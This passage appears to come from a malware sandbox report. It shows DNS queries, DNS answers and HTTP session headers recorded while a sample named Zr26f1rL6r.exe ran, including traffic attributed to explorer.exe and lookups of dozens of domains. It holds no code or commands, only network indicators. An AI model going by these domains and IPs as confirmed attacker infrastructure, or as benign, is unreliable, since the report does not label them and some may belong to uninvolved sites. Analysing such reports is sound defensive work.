Nov 25, 2021 12:59:31.654335022 CET	65320	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:31.680389881 CET	53	65320	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:56.101802111 CET	50059	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:56.131233931 CET	53	50059	1.1.1.1	192.168.11.20
Nov 25, 2021 13:00:01.211821079 CET	58005	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:00:01.233881950 CET	53	58005	1.1.1.1	192.168.11.20
Nov 25, 2021 13:00:06.240541935 CET	60077	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:00:06.458643913 CET	60077	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:00:06.735636950 CET	53	60077	9.9.9.9	192.168.11.20
Nov 25, 2021 13:00:06.831073046 CET	53	60077	1.1.1.1	192.168.11.20
Nov 25, 2021 13:00:29.942055941 CET	53089	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:00:30.156375885 CET	53089	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:00:30.477859974 CET	53	53089	9.9.9.9	192.168.11.20
Nov 25, 2021 13:00:30.897559881 CET	53	53089	1.1.1.1	192.168.11.20
Nov 25, 2021 13:00:53.886012077 CET	54716	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:00:53.921145916 CET	53	54716	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:03.977972984 CET	52925	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:04.101047993 CET	53	52925	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:04.101392984 CET	52925	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:01:05.101810932 CET	52925	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:01:05.443922043 CET	53	52925	9.9.9.9	192.168.11.20
Nov 25, 2021 13:01:05.901644945 CET	53	52925	9.9.9.9	192.168.11.20
Nov 25, 2021 13:01:10.460341930 CET	51961	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:10.623939991 CET	53	51961	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:21.473484039 CET	55688	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:21.523458958 CET	53	55688	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:26.535120964 CET	55772	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:26.753305912 CET	55772	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:01:27.768533945 CET	55772	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:28.100953102 CET	53	55772	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:28.101001024 CET	53	55772	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:28.101371050 CET	55772	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:01:28.101464033 CET	55772	53	192.168.11.20	9.9.9.9
Nov 25, 2021 13:01:28.143435001 CET	53	55772	9.9.9.9	192.168.11.20
Nov 25, 2021 13:01:29.227781057 CET	53	55772	9.9.9.9	192.168.11.20
Nov 25, 2021 13:01:29.390598059 CET	53	55772	9.9.9.9	192.168.11.20
Nov 25, 2021 13:01:33.158452988 CET	63094	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:33.178805113 CET	53	63094	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:48.514272928 CET	59518	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:48.535561085 CET	53	59518	1.1.1.1	192.168.11.20
Nov 25, 2021 13:01:53.544626951 CET	49710	53	192.168.11.20	1.1.1.1
Nov 25, 2021 13:01:53.565690994 CET	53	49710	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 12:54:53.733247995 CET	192.168.11.20	1.1.1.1	0x4274	Standard query (0)	atseasonals.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:50.986593008 CET	192.168.11.20	1.1.1.1	0x5671	Standard query (0)	www.tvterradafarinha.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:56.046475887 CET	192.168.11.20	1.1.1.1	0xbd52	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:57.061180115 CET	192.168.11.20	9.9.9.9	0xbd52	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:58.076499939 CET	192.168.11.20	1.1.1.1	0xbd52	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:58.974685907 CET	192.168.11.20	9.9.9.9	0xbd52	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:58.974780083 CET	192.168.11.20	9.9.9.9	0xbd52	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:07.997185946 CET	192.168.11.20	1.1.1.1	0xf541	Standard query (0)	www.testwebsite0711.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:13.027062893 CET	192.168.11.20	1.1.1.1	0xe8e0	Standard query (0)	www.topwowshopping.store	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:28.414575100 CET	192.168.11.20	1.1.1.1	0x5fb	Standard query (0)	www.growebox.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:33.584800005 CET	192.168.11.20	1.1.1.1	0xb6f5	Standard query (0)	www.ayudavida.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:39.584042072 CET	192.168.11.20	1.1.1.1	0x1a58	Standard query (0)	www.stylesbykee.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:45.129364967 CET	192.168.11.20	1.1.1.1	0xcf10	Standard query (0)	www.wordpresshostingblog.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:50.159405947 CET	192.168.11.20	1.1.1.1	0x48a0	Standard query (0)	www.inklusion.online	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:55.205044031 CET	192.168.11.20	1.1.1.1	0x36cd	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:55.394615889 CET	192.168.11.20	9.9.9.9	0x36cd	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:00.688455105 CET	192.168.11.20	1.1.1.1	0xf76d	Standard query (0)	www.aubzo7o9fm.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:05.718594074 CET	192.168.11.20	1.1.1.1	0x2175	Standard query (0)	www.mackthetruck.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:11.326653957 CET	192.168.11.20	1.1.1.1	0x4f7a	Standard query (0)	www.koedayuuki.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:16.543878078 CET	192.168.11.20	1.1.1.1	0xc21e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:17.559029102 CET	192.168.11.20	9.9.9.9	0xc21e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:17.785197973 CET	192.168.11.20	9.9.9.9	0xc21e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:24.589252949 CET	192.168.11.20	1.1.1.1	0xed1b	Standard query (0)	www.diamota.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:38.210880041 CET	192.168.11.20	1.1.1.1	0x1ebc	Standard query (0)	www.helpcloud.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:43.272383928 CET	192.168.11.20	1.1.1.1	0x2ba0	Standard query (0)	www.learncodeing.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:48.318795919 CET	192.168.11.20	1.1.1.1	0xb654	Standard query (0)	www.ozattaos.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:04.002094984 CET	192.168.11.20	1.1.1.1	0xb240	Standard query (0)	www.unitedmetal-saudi.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:09.580043077 CET	192.168.11.20	1.1.1.1	0xac5e	Standard query (0)	www.photon4energy.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:14.609978914 CET	192.168.11.20	1.1.1.1	0x29d3	Standard query (0)	www.diamota.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:19.779851913 CET	192.168.11.20	1.1.1.1	0x8579	Standard query (0)	www.wordpresshostingblog.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:29.855937958 CET	192.168.11.20	1.1.1.1	0x6a1b	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:30.459197998 CET	192.168.11.20	9.9.9.9	0x6a1b	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:35.605232954 CET	192.168.11.20	1.1.1.1	0x2b4d	Standard query (0)	www.aubzo7o9fm.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:46.211113930 CET	192.168.11.20	1.1.1.1	0x93f5	Standard query (0)	www.koedayuuki.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:46.429765940 CET	192.168.11.20	9.9.9.9	0x93f5	Standard query (0)	www.koedayuuki.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:51.444456100 CET	192.168.11.20	1.1.1.1	0x8f42	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:51.662826061 CET	192.168.11.20	9.9.9.9	0x8f42	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:52.678152084 CET	192.168.11.20	1.1.1.1	0x8f42	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:52.686074972 CET	192.168.11.20	9.9.9.9	0x8f42	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:52.688359022 CET	192.168.11.20	9.9.9.9	0x8f42	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:58.036858082 CET	192.168.11.20	1.1.1.1	0x614b	Standard query (0)	www.diamota.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:10.721602917 CET	192.168.11.20	1.1.1.1	0x390a	Standard query (0)	www.recoverytrivia.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:10.939840078 CET	192.168.11.20	9.9.9.9	0x390a	Standard query (0)	www.recoverytrivia.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:15.971111059 CET	192.168.11.20	1.1.1.1	0x3831	Standard query (0)	www.recruitresumelibrary.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:21.063400030 CET	192.168.11.20	1.1.1.1	0xb4ed	Standard query (0)	www.divorcefearfreedom.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.108608961 CET	192.168.11.20	1.1.1.1	0xa37a	Standard query (0)	www.jamiecongedo.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.327131987 CET	192.168.11.20	9.9.9.9	0xa37a	Standard query (0)	www.jamiecongedo.com	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:31.654335022 CET	192.168.11.20	1.1.1.1	0x18ef	Standard query (0)	www.lopsrental.lease	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:56.101802111 CET	192.168.11.20	1.1.1.1	0x4871	Standard query (0)	www.wordpresshostingblog.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:01.211821079 CET	192.168.11.20	1.1.1.1	0x50ec	Standard query (0)	www.photon4energy.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:06.240541935 CET	192.168.11.20	1.1.1.1	0xa2db	Standard query (0)	www.hsbp.online	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:06.458643913 CET	192.168.11.20	9.9.9.9	0xa2db	Standard query (0)	www.hsbp.online	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:29.942055941 CET	192.168.11.20	1.1.1.1	0x4dab	Standard query (0)	www.hsbp.online	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:30.156375885 CET	192.168.11.20	9.9.9.9	0x4dab	Standard query (0)	www.hsbp.online	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:53.886012077 CET	192.168.11.20	1.1.1.1	0x7c85	Standard query (0)	www.wordpresshostingblog.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:03.977972984 CET	192.168.11.20	1.1.1.1	0x56eb	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:04.101392984 CET	192.168.11.20	9.9.9.9	0x56eb	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:05.101810932 CET	192.168.11.20	9.9.9.9	0x56eb	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:10.460341930 CET	192.168.11.20	1.1.1.1	0x9efe	Standard query (0)	www.aubzo7o9fm.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:21.473484039 CET	192.168.11.20	1.1.1.1	0xc796	Standard query (0)	www.koedayuuki.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:26.535120964 CET	192.168.11.20	1.1.1.1	0xf45e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:26.753305912 CET	192.168.11.20	9.9.9.9	0xf45e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:27.768533945 CET	192.168.11.20	1.1.1.1	0xf45e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:28.101371050 CET	192.168.11.20	9.9.9.9	0xf45e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:28.101464033 CET	192.168.11.20	9.9.9.9	0xf45e	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:33.158452988 CET	192.168.11.20	1.1.1.1	0x7e4d	Standard query (0)	www.diamota.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:48.514272928 CET	192.168.11.20	1.1.1.1	0x6e31	Standard query (0)	www.diamota.com	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:53.544626951 CET	192.168.11.20	1.1.1.1	0x6a85	Standard query (0)	www.littlefishth.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 12:54:53.942935944 CET	1.1.1.1	192.168.11.20	0x4274	No error (0)	atseasonals.com		107.6.148.162	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:51.042181015 CET	1.1.1.1	192.168.11.20	0x5671	Name error (3)	www.tvterradafarinha.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:58.974168062 CET	1.1.1.1	192.168.11.20	0xbd52	Server failure (2)	www.3uwz9mpxk77g.biz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:55:58.974231958 CET	1.1.1.1	192.168.11.20	0xbd52	Server failure (2)	www.3uwz9mpxk77g.biz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:08.015940905 CET	1.1.1.1	192.168.11.20	0xf541	Name error (3)	www.testwebsite0711.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:13.209991932 CET	1.1.1.1	192.168.11.20	0xe8e0	No error (0)	www.topwowshopping.store		104.21.76.223	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:13.209991932 CET	1.1.1.1	192.168.11.20	0xe8e0	No error (0)	www.topwowshopping.store		172.67.201.232	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:28.519181967 CET	1.1.1.1	192.168.11.20	0x5fb	No error (0)	www.growebox.com	growebox.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 12:56:28.519181967 CET	1.1.1.1	192.168.11.20	0x5fb	No error (0)	growebox.com		81.2.194.128	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:33.892754078 CET	1.1.1.1	192.168.11.20	0xb6f5	No error (0)	www.ayudavida.com		164.155.212.139	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:39.787123919 CET	1.1.1.1	192.168.11.20	0x1a58	No error (0)	www.stylesbykee.com		172.120.157.187	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:45.150636911 CET	1.1.1.1	192.168.11.20	0xcf10	Name error (3)	www.wordpresshostingblog.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:50.179316044 CET	1.1.1.1	192.168.11.20	0x48a0	No error (0)	www.inklusion.online		3.64.163.50	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:55.394290924 CET	1.1.1.1	192.168.11.20	0x36cd	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:56:55.683530092 CET	9.9.9.9	192.168.11.20	0x36cd	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:00.714526892 CET	1.1.1.1	192.168.11.20	0xf76d	Name error (3)	www.aubzo7o9fm.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:05.759927034 CET	1.1.1.1	192.168.11.20	0x2175	No error (0)	www.mackthetruck.com		203.170.80.250	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:11.527509928 CET	1.1.1.1	192.168.11.20	0x4f7a	Name error (3)	www.koedayuuki.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:17.784806013 CET	1.1.1.1	192.168.11.20	0xc21e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:19.576499939 CET	9.9.9.9	192.168.11.20	0xc21e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:19.580840111 CET	9.9.9.9	192.168.11.20	0xc21e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:24.603919029 CET	1.1.1.1	192.168.11.20	0xed1b	Name error (3)	www.diamota.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:38.233838081 CET	1.1.1.1	192.168.11.20	0x1ebc	No error (0)	www.helpcloud.xyz		88.99.22.5	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:43.309425116 CET	1.1.1.1	192.168.11.20	0x2ba0	Name error (3)	www.learncodeing.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:48.430073023 CET	1.1.1.1	192.168.11.20	0xb654	No error (0)	www.ozattaos.xyz		172.67.164.153	A (IP address)	IN (0x0001)
Nov 25, 2021 12:57:48.430073023 CET	1.1.1.1	192.168.11.20	0xb654	No error (0)	www.ozattaos.xyz		104.21.82.227	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:04.223543882 CET	1.1.1.1	192.168.11.20	0xb240	No error (0)	www.unitedmetal-saudi.com	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 12:58:04.223543882 CET	1.1.1.1	192.168.11.20	0xb240	No error (0)	zhs.zohosites.com		136.143.191.204	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:09.592269897 CET	1.1.1.1	192.168.11.20	0xac5e	Name error (3)	www.photon4energy.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:14.773039103 CET	1.1.1.1	192.168.11.20	0x29d3	Name error (3)	www.diamota.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:19.811454058 CET	1.1.1.1	192.168.11.20	0x8579	Name error (3)	www.wordpresshostingblog.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:30.458825111 CET	1.1.1.1	192.168.11.20	0x6a1b	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:30.588610888 CET	9.9.9.9	192.168.11.20	0x6a1b	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:35.633763075 CET	1.1.1.1	192.168.11.20	0x2b4d	Name error (3)	www.aubzo7o9fm.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:46.431617975 CET	1.1.1.1	192.168.11.20	0x93f5	Name error (3)	www.koedayuuki.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:46.492364883 CET	9.9.9.9	192.168.11.20	0x93f5	Name error (3)	www.koedayuuki.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:52.685652018 CET	1.1.1.1	192.168.11.20	0x8f42	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:52.688004971 CET	1.1.1.1	192.168.11.20	0x8f42	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:53.021514893 CET	9.9.9.9	192.168.11.20	0x8f42	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:54.459963083 CET	9.9.9.9	192.168.11.20	0x8f42	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:54.460007906 CET	9.9.9.9	192.168.11.20	0x8f42	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:58:58.051316977 CET	1.1.1.1	192.168.11.20	0x614b	Name error (3)	www.diamota.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:10.964309931 CET	1.1.1.1	192.168.11.20	0x390a	Name error (3)	www.recoverytrivia.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:11.009278059 CET	9.9.9.9	192.168.11.20	0x390a	Name error (3)	www.recoverytrivia.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:16.058739901 CET	1.1.1.1	192.168.11.20	0x3831	Name error (3)	www.recruitresumelibrary.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:21.081434011 CET	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	www.divorcefearfreedom.com	divorcefearfreedom.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 12:59:21.081434011 CET	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	divorcefearfreedom.com		192.0.78.25	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:21.081434011 CET	1.1.1.1	192.168.11.20	0xb4ed	No error (0)	divorcefearfreedom.com		192.0.78.24	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.439765930 CET	1.1.1.1	192.168.11.20	0xa37a	No error (0)	www.jamiecongedo.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 12:59:26.439765930 CET	1.1.1.1	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.439765930 CET	1.1.1.1	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.439765930 CET	1.1.1.1	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.439765930 CET	1.1.1.1	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.513344049 CET	9.9.9.9	192.168.11.20	0xa37a	No error (0)	www.jamiecongedo.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 12:59:26.513344049 CET	9.9.9.9	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.513344049 CET	9.9.9.9	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.513344049 CET	9.9.9.9	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:26.513344049 CET	9.9.9.9	192.168.11.20	0xa37a	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:31.680389881 CET	1.1.1.1	192.168.11.20	0x18ef	No error (0)	www.lopsrental.lease		66.29.140.185	A (IP address)	IN (0x0001)
Nov 25, 2021 12:59:56.131233931 CET	1.1.1.1	192.168.11.20	0x4871	Name error (3)	www.wordpresshostingblog.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:01.233881950 CET	1.1.1.1	192.168.11.20	0x50ec	Name error (3)	www.photon4energy.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:06.735636950 CET	9.9.9.9	192.168.11.20	0xa2db	No error (0)	www.hsbp.online		116.62.216.226	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:06.831073046 CET	1.1.1.1	192.168.11.20	0xa2db	No error (0)	www.hsbp.online		116.62.216.226	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:30.477859974 CET	9.9.9.9	192.168.11.20	0x4dab	No error (0)	www.hsbp.online		116.62.216.226	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:30.897559881 CET	1.1.1.1	192.168.11.20	0x4dab	No error (0)	www.hsbp.online		116.62.216.226	A (IP address)	IN (0x0001)
Nov 25, 2021 13:00:53.921145916 CET	1.1.1.1	192.168.11.20	0x7c85	Name error (3)	www.wordpresshostingblog.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:04.101047993 CET	1.1.1.1	192.168.11.20	0x56eb	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:05.443922043 CET	9.9.9.9	192.168.11.20	0x56eb	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:05.901644945 CET	9.9.9.9	192.168.11.20	0x56eb	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:10.623939991 CET	1.1.1.1	192.168.11.20	0x9efe	Name error (3)	www.aubzo7o9fm.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:21.523458958 CET	1.1.1.1	192.168.11.20	0xc796	Name error (3)	www.koedayuuki.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:28.100953102 CET	1.1.1.1	192.168.11.20	0xf45e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:28.101001024 CET	1.1.1.1	192.168.11.20	0xf45e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:28.143435001 CET	9.9.9.9	192.168.11.20	0xf45e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:29.227781057 CET	9.9.9.9	192.168.11.20	0xf45e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:29.390598059 CET	9.9.9.9	192.168.11.20	0xf45e	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:33.178805113 CET	1.1.1.1	192.168.11.20	0x7e4d	Name error (3)	www.diamota.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:48.535561085 CET	1.1.1.1	192.168.11.20	0x6e31	Name error (3)	www.diamota.com	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 13:01:53.565690994 CET	1.1.1.1	192.168.11.20	0x6a85	No error (0)	www.littlefishth.com	littlefishth.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 13:01:53.565690994 CET	1.1.1.1	192.168.11.20	0x6a85	No error (0)	littlefishth.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

atseasonals.com

www.topwowshopping.store

www.growebox.com

www.ayudavida.com

www.stylesbykee.com

www.inklusion.online

www.mackthetruck.com

www.helpcloud.xyz

www.ozattaos.xyz

www.unitedmetal-saudi.com

www.divorcefearfreedom.com

www.jamiecongedo.com

www.lopsrental.lease

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49812	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49837	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49822	88.99.22.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
